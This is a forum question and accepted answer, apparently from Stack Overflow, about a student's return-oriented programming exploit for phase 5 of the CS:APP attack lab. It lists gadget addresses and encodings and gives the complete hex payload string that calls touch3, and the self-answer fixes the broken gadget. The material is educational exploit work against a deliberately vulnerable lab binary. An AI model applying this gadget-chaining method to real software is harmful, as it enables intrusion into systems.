# Segmentation fault in attack lab phase5

Tags: assembly, x86

This is the phase 5 of attack lab in my software security class. Due to address randomization and nonexecutable stack, we are supposed to use Return Oriented Programming (ROP) to pass the string pointer of a given cookie value as argument to a function called touch3. I cannot describe the question better since that's all I can understand so far, the full instruction is on this pdf page 10:
[Attack Lab](http://csapp.cs.cmu.edu/3e/attacklab.pdf)

The logic of the code (shown by other peoples's answer I can find) is:

1. padding the buffer
2. save the `%rsp`     into a register (`%rdi`     here)
3. save the address offset into a register (`%rax`     here)
4. save the sum of the above to value to a register
5. call touch3
6. cookie string
7. terminate with `\0`

I am following what other people did, and my code is same as their, but I don't actually feel clear of the logic, so I want to ask several stupid questions:

1. Why we need the sum of `%rsp`     and the offset address?
2. Why the value is popped to `%rax`     first, then we pass the address of cookie string to `%rax`    ?
3. Where I did wrong for this homework?

I can't think of a way to fix this except double checking all the encodings and addresses are used correctly.

## step1:

`48 89 e0 c3 mov %rsp, %rax`

In my gadget farm, I found:

`401ae6:  b8 27 48 89 e0          mov    $0xe0894827,%eax`
  `401aeb:  c3`

401ae6+2, reverse =>

e8 1a 40 00 00 00 00 00

## step2:

`48 89 c7 c3 mov %rax, %rdi`

In my gadget farm, I found:

`401a2d:  8d 87 48 89 c7 90       lea    -0x6f3876b8(%rdi),%eax`
  `401a33:  c3`

90 = nop, doesn't matter

401a2d+2, reverse =>

2f 1a 40 00 00 00 00 00

## step3:

58 c3 pop %rax

In my gadget farm, I found:

`401a34:  c7 07 75 ac 31 58       movl   $0x5831ac75,(%rdi)`
  `401a3a:  c3`

401a34+5, reverse =>

39 1a 40 00 00 00 00 00

## step4:

`0x48`

This constant is supposed to be the distance between the first line to cookie string line - 1, which is also referred as address offset. There are 10 lines before cookie string. So the value is (10-1)*8 = 72 = 0x48

## step5:

`89 c2 movl %eax, %edx`

In my gadget farm, I found:

`401aa2:  c7 07 89 c2 90 c3       movl   $0xc390c289,(%rdi)`
  `401aa8:  c3`

401aa2+2, reverse =>

a4 1a 40 00 00 00 00 00

## step6:

`89 d1 movl %edx, %ecx`

In my gadget farm, I found:

`401afa:  8d 87 89 d1 08 c9       lea    -0x36f72e77(%rdi),%eax`
  `401b00:  c3`

08 c9 = orb R, R = nop, doesn't matter

401afa+2 reverse =>

fc 1a 40 00 00 00 00 00

## step7:

`89 ce movl %ecx, %esi`

In my gadget farm, I found:

`401ab0:  b8 72 74 89 ce          mov    $0xce897472,%eax`
  `401ab5:  c3`

401ab0+3, reverse =>

b3 1a 40 00 00 00 00 00

## step8:

`lea (%rdi, %rsi, 1), %rax`

In my gadget farm, I found:

`401a68:  48 8d 04 37             lea    (%rdi,%rsi,1),%rax`
  `401a6c:  c3`
401a68, reverse =>

68 1a 40 00 00 00 00 00

## step9:

`48 89 c7 c3 mov  %rax, %rdi`

In my gadget farm, I found:

`401a48:  b8 34 48 89 c7          mov    $0xc7894834,%eax`
  `401a4d:  c3`

401a48+2 reverse =>

4a 1a 40 00 00 00 00 00

## step10:

touch3 address
(confirmed correct from phase 3)
8a 19 40 00 00 00 00 00

## step11:

string representtion of cookie
(confirmed correct from phase 3)

33 65 35 32 64 66 66 35 00

```
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 /* buffer */
    e8 1a 40 00 00 00 00 00 /* step1: mov  %rsp, %rax */
    2f 1a 40 00 00 00 00 00 /* step2: mov %rax, %rdi */
    39 1a 40 00 00 00 00 00 /* step3: pop %rax */
    48 00 00 00 00 00 00 00 /* step4: constant 0x48 */
    a4 1a 40 00 00 00 00 00 /* step5: movl %eax, %edx */
    fc 1a 40 00 00 00 00 00 /* step6: movl %edx, %ecx */
    b3 1a 40 00 00 00 00 00 /* step7: movl %ecx, %esi */
    68 1a 40 00 00 00 00 00 /* step8: lea (%rdi, %rsi, 1), %rax */
    4a 1a 40 00 00 00 00 00 /* step9: mov %rax, %rdi */ 
    8a 19 40 00 00 00 00 00 /* step10: touch3 address */
    33 65 35 32 64 66 66 35 /* step11: string representtion of cookie */
    00 00 00 00 00 00 00 00
```

Comment: We don't know your phase5 you are trying to attack, hence can't comment on your solution. Use a debugger to single step and see what is happening. EDIT: your step2 says "save the %rsp into a register (%rdi here)" but your code is saving rax not rsp.

Answer (score 0, accepted):

The reason is that 0x90 isn't working as a nop in step2. The problem is solved by replacing the line of step 2 with line of step 9. They are supposed to be same anyway. I thought I happened to find 2 different sets of gadgets, so I used two different addresses which I believed were interchangeable, but turned out nop has to start from the begining.....

for step2:

`401a2d:  8d 87 48 89 c7 90       lea    -0x6f3876b8(%rdi),%eax`

`401a33:  c3`